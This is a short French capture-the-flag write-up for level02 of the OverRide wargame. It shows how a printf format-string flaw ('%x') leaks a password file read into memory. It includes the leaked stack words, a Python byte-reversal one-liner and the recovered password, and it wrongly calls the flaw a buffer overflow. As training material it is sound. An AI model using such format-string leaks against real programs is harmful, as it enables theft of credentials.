Dans ce level nous allons nous d'un printf vunerable au buffer overflow.
A partir de ce printf nous allons pouvoir lui transmettre comme argument "%x" pour pouvoir afficher
toute la stack.

printf(&format);


stream = fopen("/home/users/level03/.pass", 0x400bb0, 0x400bb0);
buffer = fread(&ptr, 1, 0x41, stream);
plus haut dans le programme on peu remarquer qu'il ouvre le fichier .pass et qu'il met son contenu
dans un buffer.
En affichant un nombre suffisant d'octect on va pouvoir voir apparaitre le mot de passe

0
756e505234376848 <-- debut du mot de passe
45414a3561733951
377a7143574e6758
354a35686e475873
48336750664b394d
0



une fois le mot de passe trouve dans la stack il nous faut reverse chaque bloque d'octect pour avoir le resultat en big endian

python -c 'print(
	"\x75\x6e\x50\x52\x34\x37\x68\x48"[::-1] +\
	"\x45\x41\x4a\x35\x61\x73\x39\x51"[::-1] +\
	"\x37\x7a\x71\x43\x57\x4e\x67\x58"[::-1] +\
	"\x35\x4a\x35\x68\x6e\x47\x58\x73"[::-1] +\ 
	"\x48\x33\x67\x50\x66\x4b\x39\x4d"[::-1])'

apres execution cela nous donne:

Hh74RPnuQ9sa5JAEXgNWCqz7sXGnh5J5M9KfPg3H
level02@OverRide:~$